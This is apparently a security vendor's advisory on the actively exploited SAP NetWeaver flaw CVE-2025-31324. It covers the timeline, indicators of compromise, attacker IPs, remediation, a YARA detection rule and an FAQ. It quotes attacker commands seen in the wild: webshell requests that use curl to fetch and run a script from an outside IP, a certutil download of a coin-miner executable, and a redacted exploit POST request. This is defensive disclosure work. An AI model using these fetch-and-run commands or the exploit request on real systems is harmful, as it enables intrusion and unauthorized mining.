SAP NetWeaver Flaw Lets Hackers Take Full Control: CVE-2025-31324 Explained
Latest update: May 7, 2025 at 6:00 p.m. The Onapsis Research Labs captured and analyzed real exploit samples through our SAP Threat Intelligence sensor network, allowing us to reconstruct zero-day attacks showing full remote command execution (RCE). The publicly discussed artifacts (i.e., the webshells) represent adversarial behavior from the broader attack campaign. However, RCE commands appear to be used in the reconnaissance phase and then webshells were deployed via RCE. The observed exploit demonstrates highly-advanced knowledge of SAP from the threat actor group responsible. Living-off-the-land compromise and webshell-less persistence is possible based on the Onapsis-observed payload, and defenders should adjust IR playbooks accordingly. This continues to be an active and evolving investigation, and ORL is collaborating very closely with SAP security teams. It is highly recommended that all SAP customers ensure that they have applied the emergency patch from SAP (Security Note #3594142) released on April 24, 2025.
As of April 30, Onapsis Research Labs has released a YARA rule, derived from the attack campaign, that identifies positive webshell access to aid cybersecurity teams at organizations who have deployed SAP as well as the broader security community. This YARA rule has been updated to reflect additional, known webshells as of May 5, 2025.
Summary of CVE-2025-31324
- A zero-day SAP vulnerability with CVSS score of 10.0 is being actively exploited in the wild.
- CVE-2025-31324 affects SAP Visual Composer, allowing unauthenticated threat actors to upload arbitrary files, resulting in immediate full compromise of the targeted system.
- SAP Visual Composer is not installed by default, but is broadly enabled because it was a core component used by business process specialists to develop business application components without coding.
- First public report was via a public blog posted by security research firm ReliaQuest on April 22, 2025.
- SAP rapidly released an emergency patch for this issue on April 24, 2025 at approximately 1:00 PM EST (US).
- In forensic response to the public report, evidence of active exploitation was noted by Onapsis Threat Intelligence and reported by multiple IR firms and security researchers.
- On April 27, 2025 Onapsis Research Labs released an open-source scanner for CVE-2025-31324. Please see the Open-Source Scanner for CVE-2025-31324 section below for more information.
- On April 29, 2025, CISA added the CVE to their Known Exploited Vulnerabilities Catalog.
- As of April 30, 2025, Onapsis Research Labs is seeing significant activity from attackers who are using public information to trigger exploitation and abuse webshells placed by the original attackers, who have currently gone dark.
- As of May 5, 2025, Onapsis Research Labs and other security firms are seeing evidence of follow-up, opportunistic attackers using previously established webshells from the prior attack campaign in order to stage new attacks.
Active Campaign Details & Timeline of CVE-2025-31324
Active Exploitation of this SAP Zero-Day Vulnerability in the Wild
- From January 20, 2025 until February 10, 2025, Onapsis Research Labs saw reconnaissance activity, testing with specific payloads against this vulnerability, within our global honeypot network.
- After February 10, 2025, the reconnaissance activity decreased, and we began to see exploitation attempts.
- Some organizations have reported to Onapsis seeing successful compromises deploying webshells in March 2025, specifically between March 14th and March 31st. Mandiant noted that their first known exploitation via incident response occurred on March 12, 2025.
- Rapid7 noted that their “MDR has observed exploitation in multiple customer environments dating back to at least March 27, 2025.”
- On April 22, 2025 ReliaQuest publicly reported observations. Their assessment, based on the fact that exploitation occurred on systems with recent patches, was that it likely involved the use of an unreported RFI issue against public SAP NetWeaver servers.
- On April 22, 2025, SAP acknowledged the issue and updated an existing SAP KBA 3593336 (“Unfamiliar files found in SAP NetWeaver Java file system”), linking the existing KBA about unfamiliar files to this campaign. The FAQ document (SAP Note 3596125, released April 24, 2025) confirmed that unfamiliar files like ‘.jsp’, ‘.java’, or ‘.class’ in specific paths like …\irj\root, …\irj\work, and …\irj\work\sync are common targets and should be considered malicious.
- On April 24, 2025, SAP officially identified the vulnerability as CVE-2025-31324, described as a “Missing Authorization check in SAP NetWeaver (Visual Composer development server)”. SAP identified an improper authorization check could allow an unauthenticated agent to upload potentially malicious executable binaries.
- In forensic response, the Onapsis Research Labs obtained evidence of active exploitation of this zero-day vulnerability, noted by the exclusive Onapsis Threat Intelligence. Onapsis observed this activity on Internet-facing SAP applications and was also contacted by SAP customers who shared insights into the topic. Concurrently, multiple Incident Response firms and security researchers were also reporting observing active exploitation.
- On April 29, 2025, CISA officially added the CVE to its Known Exploited Vulnerabilities Catalog for actively exploited vulnerabilities in the wild.
- On April 30, 2025, SAP updated SAP Note #3593336 to include a new workaround (“Option 0: Complete removal of sap.com/devserver_metadataupload_ear application”) which is their new recommended workaround to completely remove the application from the vulnerable systems that cannot be patched.
- As of April 30, 2025, the original attackers have gone quiet. However, it is reasonable to expect that their prior exploits were captured and could be used in future attacks by other threat actor groups.
- As of April 30, 2025, Onapsis Research Labs is also seeing significant activity from many opportunistic attackers who are using publicly available information to trigger exploitation and abusing webshells placed by the original attackers.
- On May 1, 2025, SAP re-released SAP Security Note #3594142 (v18) that expanded patching support to include SAP NetWeaver 7.5 systems on earlier service packs, now starting with SP 020.
- On May 2, 2025, Mandiant & Onapsis released an open source tool and threat briefing to help organizations identify Indicators of Compromise (IoCs) associated with active in-the-wild exploitation of CVE-2025-31324.
- As of May 5, 2025, Onapsis Research Labs, other security firms, and other incident responders confirm that they are seeing a second wave of attacks staged by follow-on, opportunistic threat actors who are leveraging previously established webshells (from the first zero-day attack) on vulnerable systems.
- As of May 6, 2025, Onapsis Research Labs and other incident responders are seeing webshells with randomized names of varying length instead of the previously observed webshells with randomized 8-character names.
- As of May 6, 2025, Onapsis Research Labs has determined that, while representative of the broader campaign adversarial behavior, the publicly discussed webshells were likely uploaded via remote command execution (RCE) after other RCE commands were executed during the reconnaissance phase of the original attack, demonstrating a threat actor group with highly advanced knowledge of SAP. This means that “living-off-the-land” compromise and persistence is possible without webshells, based on the Onapsis-observed payload.
- As of May 6, 2025, the Mandiant and Onapsis compromise assessment tool has been updated to include functionality to examine logs for evidence of exploit or webshell access.
- It is exceedingly important for all SAP customers to deploy SAP Security Note 3594142 to remove unauthenticated access to the vulnerable component on affected systems.
Indicators of Compromise
SAP has provided guidance on determining if systems have already been compromised in.SAP Note #3596125 – this note details the following steps:
Check the root of the following OS directories for the presence of ‘jsp’, ‘java’, or ‘class’ files.
- C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root
- C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work
- C:\usr\sap\<SID>\<InstanceID>\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
The presence of these files is an indication an attacker has leveraged the vulnerability to upload arbitrary files. The system should be considered compromised and the appropriate incident response plan should be followed.
The following image illustrates a potential review of a given SAP Application:
| [root@sapserver irj]# pwd /usr/sap/<SID>/<INSTANCE>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj [root@sapserver irj]# find . -type f -name “*.jsp” -ls [root@sapserver irj]# find . -type f -name “*.java” -ls [root@sapserver irj]# find . -type f -name “*.class” -ls |
Observed Tactics
Different tactics have been observed by the Onapsis Research Labs (ORL), mapped to the MITRE ATT&CK Framework:
- T1190 (Exploit Public-Facing Application)
- T1505.003 (Server Software Component: Web Shell)
Below is a collection of observed IOCs from ORL research, ORL incident response collaborations, and Mandiant incident response activities:
- helper.jsp – Observed in multiple reports
- cache.jsp – Observed in CVE-related reports
- forwardsap.jsp
- coresap.jsp
- webhelp.jsp
- .webhelper.jsp – Hidden variant
- usage.jsp – Possibly a renamed “helper.jsp”
- usage1.jsp – Variant of usage.jsp
- 404_error.jsp – Potentially a disguised webshell
- .h.jsp – Hidden file variant
Malicious Webshell Filenames Identified with Associated Hashes (SHA256):
- coresap.jsp webshell:
4c9e60cc73e87da4cadc51523690d67549de4902e880974bfacf7f1a8dc40d7d - Random 8-character names ([a-z]{8}).jsp
b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee
Note: Onapsis Research Labs (ORL) and other incident responders are now beginning to see webshells with randomized names of varying lengths – not just random 8-character names. ORL continues to monitor and will provide further updates.
Additionally, the ReliaQuest research team provided the following IOCs to search across SAP Applications:
- Helper.jsp webshell: 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087
- Cache.jsp webshell: 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf
Note: The ReliaQuest blogpost was recently updated (May 2, 2025) with additional IOCs from their investigations.
Secondary, Opportunistic Attacks
As part of the original zero-day attack, webshells were established on vulnerable SAP NetWeaver systems. As the Onapsis Research Labs noted on April 30th, the original attackers may have gone quiet, but the ongoing threat continued, as a secondary wave of opportunistic attackers were using publicly available information to trigger exploitation and abusing the webshells placed by the original attackers.
In just one example, the Onapsis Research Labs observed multiple command attempts that ultimately were unsuccessful on a single SAP system:
| https://<sap_server>/irj/helper.jsp?cmd=curl%20-o%20/tmp/8bq.sh%20http://23.95.123.5:666/xmrigCCall/8bq.sh https://<sap_server>/irj/helper.jsp?cmd=chmod%20777%20/tmp/8bq.sh https://<sap_server>/irj/helper.jsp?cmd=/tmp/8bq.sh https://<sap_server>/irj/helper.jsp?cmd=rm%20/f%20/tmp/8bq.sh |
In a recent blogpost dated April 30, WithSecure Labs also noted uncovering a sophisticated attack that leveraged an existing webshell to attempt XMRig Coin Miner deployment:
| cmd /c certutil -urlcache -split -f hxxp://23.95.123[.]5:666/xmrigCCall/1110.exe C:\Users\Public\1110.exe IOCs (from their blogpost): – 272b2fc48f6cbbf105cbe961b163de99e761b31d – 925f6bc2a3fb5bb15a434f5f42196d49f36459e3 – 65.49.235[.]210 – 23.95.123[.]5 |
IP Addresses
A large number of IP addresses were observed as part of this active attack campaign through Onapsis research, Onapsis Research Labs incident response collaborations, as well as courtesy of other IR and security firms. We’ve broken down the list of observed IPs by source for clarity and convenience.
1) IP Addresses Observed Prior to April 22, 2025 as Part of Onapsis Research Labs Research and Investigation:
| 50.114.94.55 | 63.135.161.223 | 199.101.196.85 | 212.30.36.232 |
| 50.114.94.56 | 63.135.161.224 | 212.30.36.171 | 212.30.36.234 |
| 50.114.94.57 | 63.135.161.226 | 212.30.36.173 | 216.73.161.8 |
| 50.114.94.68 | 63.135.161.229 | 212.30.36.175 | 216.73.161.15 |
| 50.114.94.72 | 63.135.161.235 | 212.30.36.176 | 216.73.161.17 |
| 50.114.94.74 | 63.135.161.242 | 212.30.36.183 | 216.73.161.18 |
| 50.114.94.86 | 63.135.161.245 | 212.30.36.200 | 216.73.161.20 |
| 50.114.94.91 | 85.239.54.153 | 212.30.36.206 | 216.73.161.21 |
| 50.114.94.95 | 91.193.19.36 | 212.30.36.215 | 216.73.161.22 |
| 50.114.94.97 | 142.111.152.19 | 212.30.36.218 | 216.73.161.25 |
| 50.114.94.100 | 142.111.152.20 | 212.30.36.219 | 216.73.161.26 |
| 50.114.94.104 | 142.111.152.23 | 212.30.36.228 | |
| 63.135.161.220 | 142.111.152.24 | 212.30.36.231 |
2) IP Addresses Observed through Onapsis Research Labs IR Engagement Collaborations
| 91.193.19.36 | 143.198.173.194 | 136.144.35.192 | 136.144.35.206 |
| 91.218.50.174 | 167.99.150.59 | 136.144.35.196 | 136.144.35.207 |
| 206.189.229.132 | 37.49.228.122 | 136.144.35.197 | 136.144.35.213 |
| 159.89.93.5 | 206.188.197.52 | 136.144.35.199 | 89.187.164.96 |
| 104.248.236.95 | 85.239.54.153 | 136.144.35.200 | 136.144.35.210 |
| 142.93.63.24 | 192.42.116.200 | 136.144.35.201 | 136.144.35.211 |
| 134.122.26.60 | 103.207.14.236 | 136.144.35.202 | 136.144.35.189 |
| 137.184.197.225 | 104.28.212.150 | 136.144.35.203 | 136.144.35.214 |
| 167.99.11.36 | 104.28.244.150 | 136.144.35.204 | |
| 204.48.22.207 | 136.144.35.191 | 136.144.35.205 |
3) IP Addresses Reported Publicly by Other IR and Security Firms
Thanks to Red Canary, CrowdSec, and WithSecure Labs for their public contributions to support the SAP defenders with this critical CVE.
- Red Canary IP addresses can be found in their blogpost from April 30, 2025 here.
- CrowdSec IP Addresses can be found here.
- WithSecure Labs noted IP addresses from follow-on attacks in their blogpost here.
The Onapsis Research Labs is always looking for opportunities to collaborate with incident response and security firms. If you have indicators of compromise you want to share, want us to reference or link to your findings / analyses, or have other joint collaboration ideas, please contact us at [email protected].
Vulnerability Overview
SAP Zero-Day Vulnerability (CVE-2025-31324) Overview
Affected Component: The vulnerability exists in the SAP Visual Composer component for SAP NetWeaver 7.xx (all SPS), specifically within the “developmentserver” part of the application. This component is part of the SAP NetWeaver Java stack. While not installed by default, it is widely enabled across existing SAP NetWeaver Application Server Java systems due to its broad usefulness in assisting business process specialists with developing business components without the use of coding.
Root Cause: The fundamental issue is an Improper authentication and authorization check in the application. This means the Metadata Uploader is not protected when an unauthenticated user wants to leverage some of its functionality.
Criticality: The vulnerability has been graded with a CVSS of 10, since it allows for a full system compromise, if successfully exploited.
Exploitation Method: The vulnerability is exploitable through HTTP/HTTPS, potentially over the Internet. Attackers target the /developmentserver/metadatauploader URL by sending carefully crafted GET, POST, and HEAD HTTP requests.
Authentication Requirement: No authentication is required to exploit it, allowing unauthenticated agent or unauthenticated threat actors to interact with the vulnerable component.
Technical Impact: While previously thought to be limited to arbitrary file upload, further investigation from Onapsis Research Labs has identified that this is actually remote command execution (RCE). The publicly discussed artifacts (i.e., the webshells) are representative of the broader adversarial behavior from the initial attack campaign. Threat actors can upload (and have uploaded) potentially malicious code files, most commonly webshells. Examples of filenames observed include “helper.jsp” and “cache.jsp”. However, the Onapsis Research Labs investigation has concluded that this was likely done via RCE after prior reconnaissance was done with RCE commands. This means that while the presence of webshells as noted here and in other places serve as viable indicators of compromise for the specific active campaign, the ability for a threat actor to “live off the land” (i.e., “webshell-less”) and achieve full compromise and persistence is entirely possible.
Attack Surface: While the SAP Visual Composer component is an optional component to install, Onapsis research indicates this component is installed and enabled in at least 50% of Java systems, with the research indicating the percentage could be as high as 70%.
Exploitation Details
| It is important to stress that as of the latest update to this post, no publicly available exploit code has been published. However, be aware that exploits do exist and have been actively used in the wild. Onapsis Research Labs will continue to update this resource with further guidance and additional information as it is uncovered. |
Exploitation happens via a POST, HEAD, or GET request to the vulnerable component. Upon successful exploitation, threat actors are able to execute arbitrary commands (RCE). Threat actors have been observed uploading webshells to vulnerable systems. These webshells allow the threat actor to execute arbitrary commands in system context, with the privileges of the <sid>adm Operating System user, giving them full access to all SAP Resources.
| POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1 Host: <REDACTED> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: application/octet-stream Content-Length: 3200 <POST_BODY_REDACTED> |
Example of exploitation of the vulnerability
Business Impact of CVE-2025-31324
With <sid>adm access, the attacker gains unauthorized access to the underlying SAP Operating System using the user and privileges of the processes running in the SAP Application Server, implying full access to any SAP resource, including the SAP system database without any restrictions, permitting them to take several actions (e.g., shut down the SAP application or deploy ransomware).
Additionally, the system can be used as a foothold into a network for the attacker to pivot from this initial entry point and access other internal systems, taking advantage of the interconnected nature of SAP systems.
As always, the potential for immediate full compromise is a serious matter and one that should be prioritized by your team. It could lead to malicious and unauthorized business activity affecting critical SAP systems, including but not limited to modifying financial records, deploying ransomware, viewing personally identifiable information (PII), corrupting business data, and deleting or modifying logs, traces, and other actions that jeopardize essential business operations.
Furthermore, for organizations subject to strong regulatory requirements (e.g., US: SEC Rules on Cybersecurity; EU: NIS2) or industry compliance frameworks (e.g., Sarbanes-Oxley, NERC), the resulting deficiency in IT controls for such regulatory or compliance mandates could be significant and far reaching, including (but again not limited to) corporate liability for corrupted or modified data, exfiltration of sensitive and/or financial data, and the exposure of PII.
Patching for CVE-2025-31324, mitigation if you are unable to patch, and – if exposed – compromise assessment should all be critical priorities.
Assessing Exposure
In order to determine if your systems are vulnerable, you need to list the Components of the SAP System – for each Java system. If either VISUAL COMPOSER FRAMEWORK or VCFRAMEWORK is listed as installed, then the system has the targeted component.
The following screenshot illustrates the listing of components, filtered by the affected component, which is VCFRAMEWORK. This can be obtained by navigating to the homepage of the SAP NetWeaver Application Server Java → System Information → Components Info (tab).
Image 1: Example of a vulnerable component version.
You then need to manually review if the patch from SAP Security Note #3594142 has been applied or one of the mitigations in SAP KB #3593336 have been implemented. For Onapsis customers, please review the Onapsis Platform Coverage section in this article to see how this assessment can be done automatically across your entire landscape.
Remediation Steps & Recommendations for CVE-2025-31324
SAP Resources
SAP has released the following notes to help customers protect themselves from this active threat:
- SAP Security Note #3594142 – Provides the hot fix support packages to help patch the vulnerability. Also points to SAP Note #3596125 and initial manual actions to identify evidence of prior exposure
- SAP Note #3596125 – FAQ for Security Note #3594142. Please note that this document is evolving, and SAP continues to update and evolve this FAQ and guidance.
- SAP Note #3593336 – Provides workaround mitigation steps for customers that cannot apply the patch. Note that, as of April 30, SAP has updated this note with a new workaround (“option 0”) which is the new recommended mitigation.
Need to scan your environment? Learn more about our free Indicators of Compromise Scanner released in partnership with Mandiant.
Onapsis Platform Coverage
The Onapsis team published comprehensive support for this vulnerability on April 24, 2025, the day SAP’s emergency patch was published.
- Onapsis Assess supports identifying all SAP systems with the vulnerable component.
- Run updated Module 459 “Check missing JAVA SAP Security Notes” to find the vulnerability and review findings for OKBID MNJ_3594142.
- Run new Module 1059 “[CVE-2025-31324] Missing Authorization check in SAP NetWeaver (Visual Composer development server)” to check if any of the workarounds detailed in SAP Note #3593336 have been implemented. If so, Assess reports a MEDIUM vulnerability (i.e., because you still have the vulnerable component, it is just not currently accessible) and returns issue SAP_105950.
- Onapsis Defend monitors and alerts on POST, GET, and HEAD requests to an unpatched SAP Visual Composer component.
- Defend rule released April 24. ID is 74b6519b3821d7be9ac1d0c259c5d3c2.
- Defend update issued April 25 to include that rule in the shipped Incident Profile, “OP_Shipped_SOC_JAVA”.
- A Threat Intel Center article was published, providing both details on the vulnerability and exploitation and a central location to view all vulnerable systems and any attempts to interact with the vulnerable component.
As of April 30, 2025, Onapsis has expanded on our platform support to help users with further compromise assessment.
- Onapsis Assess supports deeper analysis of Java systems for indicators of compromise related to this vulnerability
- Run Module 1060 “[CVE-2025-31324] Check for Existence of Indicators of Compromise from Known Campaigns Targeting Visual Composer Development Server” to flag if any webshells known from the campaign are found.
- Run Module 1061 “[CVE-2025-31324] Check for Existence of Indicators of Compromise not from Known Campaigns Targeting Visual Composer Development Server” to flag potentially more targeted attacks on your organization.
- Onapsis Defend will detect access to known webshells in your environment
- Defend rule has been added to the “OP_Shipped_SOC_JAVA” Incident Profile.
- Threat Intel Center has been updated to include the new modules and rules listed above.
- Onapsis Network Detection Rule Pack (NDRP)
- A new signature has been added to NDRP allowing network security tools to identify traffic containing attempts to exploit the vulnerability.
Existing Onapsis Assess customers can run an assessment scan against their entire landscape to identify systems with the vulnerable component installed and unpatched, with no workaround/mitigation applied. Ongoing automatic scanning can track your progress addressing the vulnerable systems and removing the risk of compromise in your environment. Additional Assess modules will check Java systems for IoCs related to this vulnerability.
While remediation work is underway, Onapsis Defend customers have automatic monitoring of interactions with the vulnerable component. Due to the reduced level of detail captured in POST, GET, and HEAD requests in SAP system logging, Defend cannot detect the presence of a webshell or other payload in these requests themselves, but it can alert if the requests are made to a vulnerable SAP Visual Composer component. An additional Defend rule can alert on access to known webshells in your SAP environment.
On April 25, 2025, Onapsis offered two live briefings providing details on the vulnerability, the active exploitation, and mitigation guidance. A third session was held on April 29, 2025. Click here to watch an on-demand video of that session. Some of the most common questions we received across our sessions have been listed below for your reference. Due to the overwhelming response, we hosted another threat briefing in collaboration with Mandiant on May 7, where we discussed the current state of the attack campaign. That session can be viewed on-demand here.
Ongoing guidance continues to be published for our clients within the Onapsis SAP Defenders Community. This guidance will be updated as new information continues to be uncovered about this threat and its impact. The Onapsis SAP Defenders Community provides a forum for Onapsis customers to learn ongoing threat intelligence, gain access to exclusive resources, interact directly with Onapsis experts, and collaborate with other SAP security professionals.
Open-Source Scanners for CVE-2025-31324
Whitebox Indicators of Compromise (IoCs) scanner
Onapsis, in collaboration with Mandiant, has developed and released an open source tool to identify Indicators of Compromise (IoCs) on potentially-affected SAP systems. This tool enables defenders to:
- Detect whether the system is vulnerable to CVE-2025-31324
- Identify known Indicators of Compromise (IOCs) related to available campaign information
- Scan for unknown web-executable files in known exploit paths
- Collect suspicious files into a structured ZIP archive with a manifest for future analysis
- Scan HTTP Access logs for evidence of access to the vulnerable component or suspicious artifacts
- Collect extracted log entries for future analysis
Download the tool from the Onapsis Github repository here.
Blackbox Vulnerability Scan and Remote Known Webshell Detection
In order to support defenders with exposure and compromise assessments, Onapsis Research Labs (ORL) has created an open source scanner allowing SAP customers to analyze their environment in a non-intrusive manner to identify if any of their systems are vulnerable to CVE-2025-31324, which continues to be actively exploited in the wild.
This tool will execute a non-intrusive remote scan via IP address to determine the following:
- Is the affected component present or not present?
- Is the affected component patched or not patched?
- Are the known webshells present or not present?
Download the tool from the Onapsis Github repository here.
As this continues to be a developing situation, Onapsis Research Labs will continue updating these tools as more information is known. The tools include functionality to check if there is a newer revision available for download as well to help make sure your teams are always using the most current version from the ORL.
Please note that these tools are provided from Onapsis licensed under the Apache License, Version 2.0. These tools are a contribution to the security, incident response, and SAP communities to aid in response to active exploitation of CVE-2025-31324. We consider the tools to be “under development” and will be iterated rapidly as more information becomes available either from Onapsis Research Labs or publicly. As always, this is a best-effort development and offered “as-is” with no warranty or liability. We strongly recommend complementing these tools’ usage with a thorough review of potentially vulnerable and compromised systems.
YARA
To aid defenders at organizations running SAP as well as the broader security community, the Onapsis Research Labs has created a YARA rule to help identify successful access to the webshells placed by the attack campaign:
| rule detect_CVE202531324_webshells_by_name { meta: description = “Detects the known webshell file names that are uploaded in the root directory” author = “Emanuela Ionas, Onapsis Research Labs” date = “2025-05-05” tags = “CVE-2025-31324” strings: $webshell_1 = “/irj/cache.jsp” nocase $webshell_2 = “/irj/helper.jsp” nocase $webshell_3 = “/irj/forwardsap.jsp” nocase $webshell_4 = “/irj/coresap.jsp” nocase $webshell_5 = “/irj/webhelp.jsp” nocase $webshell_6 = “/irj/.webhelper.jsp” nocase $webshell_7 = “/irj/usage.jsp” nocase $webshell_8 = “/irj/usage1.jsp” nocase $webshell_9 = “/irj/404_error.jsp” nocase $webshell_10 = “/irj/.h.jsp” nocase $webshell_regex = /\/irj\/[._a-zA-Z0-9]{2,10}\.jsp/ $status = /HTTP\/[12]\.[012]\s+200/ condition: ($webshell_1 or $webshell_2 or $webshell_3 or $webshell_4 or $webshell_5 or $webshell_6 or $webshell_7 or $webshell_8 or $webshell_9 or $webshell_10 or $webshell_regex) and $status } |
Special Support for SAP Customers
To support qualified SAP customers that require investigation, threat remediation, and additional post compromise security monitoring, Onapsis is offering a complementary assessment and a 3-month free subscription to the Onapsis Platform. Please contact [email protected] for more information.
Additional Expert Coverage on CVE-2025-31324 From Onapsis:
- Watch our on-demand webinar
- Watch our on-demand session with Mandiant
- Learn about our indicators of compromise scanner in collaboration with Mandiant
- Get the latest updates on Onapsis threat research regarding CVE-2025-31324
Frequently Asked Questions About CVE-2025-31324
Q: Which SAP NetWeaver Java System versions are affected by this vulnerability?
A: SAP has confirmed, in their FAQ SAP Note #3596125, that all 7.xx versions and all SPS are affected.
Q: If we have NetWeaver Java “7.x SPS x” with Visual Component framework installed, are we still vulnerable?
A: Yes – it is highly likely that those systems running the older version of NetWeaver are vulnerable. Additionally, it’s worth noting that SAP NetWeaver Application Server Java 7.40 or below versions are not supported and do not receive updates. For these older versions, you will have to implement one of the work around options detailed in SAP Note 3593336 if you are unable to upgrade (and subsequently patch) the system.
Q: Which component of the SAP NetWeaver Java System is impacted?
A: The SAP Visual Composer (VCFRAMEWORK) application
Q: If our SAP is not an Internet-facing environment, are we just worried about insider threats or are we still vulnerable from malicious attackers?
A: The only thing that will change if the SAP application is not Internet-facing is the frequency of exploitation. This vulnerability is CVSS 10.0 and should be considered critical and acted on immediately. Due to the nature of the vulnerability and how it is exploited, we expect to see automated exploit tools taking advantage of this vulnerability and tools that could easily be executed from within a network. Additionally, this could be leveraged by malicious software such as malware or ransomware.
Q: Was this vulnerability found by a researcher, or is it being exploited in the wild and some security services detected the actual attacks?
A: This vulnerability was identified based on the observations of active exploitation across SAP applications in the wild by several different incident response teams and security researchers. It was first publicly discussed in a blogpost by ReliaQuest.
Q: Are there any specific sectors or industries that malicious attackers are targeting based on the research so far?
A: We are gathering consolidated information related to the targeted industries, but at this stage, all critical infrastructure should be considered at high risk based on the level of threat activity we have seen. Due to the severity of the vulnerability (CVSS 10.0) and how it can be exploited over HTTP, all organizations should take steps to patch or mitigate immediately, in light of the threat activity we have seen over the past couple of days.
Q: Are there any specific operating systems platforms that are particularly vulnerable to ransomware?
A: In general, Microsoft Windows-based OSs are preferred targets for ransomware gangs because they have everything instrumented when it comes to ransomware. However, the threat of ransomware is not limited to just Windows, so it is best not to assume that if your SAP systems are running on a non-Windows OS you are immune from a ransomware attack.
Q: How can I check if the Visual Composer is installed?
A: You need to list the components of the SAP System. If “VISUAL COMPOSER FRAMEWORK”, or VCFRAMEWORK is installed, then the system is vulnerable, meaning you will have to apply the patch from SAP Security Note #3594142 or leverage one of the mitigations in SAP Note #3593336, which basically makes the component unreachable.
If you are an Onapsis customer, you can use Assess to scan all your Java systems. Assess will identify not only the systems that have the component but report an issue for any that have the component and are not secured against the vulnerability.
Q: How can we identify if Visual Composer is actually being used or not? Do we consider if VCFRAMEWORK is installed and services are running?
A: To determine if SAP’ Visual Composer is actually being leveraged on a system to develop applications requires analysis of the logs to understand if users are accessing the component. Additionally you would need to ascertain if the service is also needed at runtime or just development, which would depend on how development is done in the organization.
Q: Is there a risk if the component is in a “stopped” state?
A: That is one of the five workarounds shared by SAP in their Knowledge Base Article #3593336. However all you have done is simply reduced the risk – not eliminated the vulnerability itself. This workaround could be reversed, which leads to the possibility that a change made in the future could re-expose your enterprise to this attack campaign. The ultimate fix, at this time, remains applying the patch on all vulnerable systems.
Q: Are there any real “temp files” getting created at the OS level as part of attacks?
A: The vulnerability allows the attacker to upload arbitrary files to the OS of the vulnerable system. These would not be temp files but rather specific files uploaded by the attacker. There are various Indicators of Compromise (IoCs) associated with exploitation of this vulnerability, which we are continuously updating here on this page.
Q: Do the original threat actors appear to be financially motivated? Has ransomware been deployed?
A: Regarding motivation of the attacks, nothing has been disclosed publicly nor has there been attribution to a particular or multiple threat actor groups at this time. However, financial gain is always a very common motivation with ransomware being a common device used by threat actors and double extortion an increasingly more common attack trend.
Q: Are these indicators of compromise – i.e., the *.jsp, *.java files – expected to be in hidden file formats?
A: Initially, these files would not be hidden. However, bear in mind that after the attacker uploads web-executable code to the system, they gain the ability to perform a large number of administrative actions, which include taking actions to cover their tracks – i.e., make files hidden.
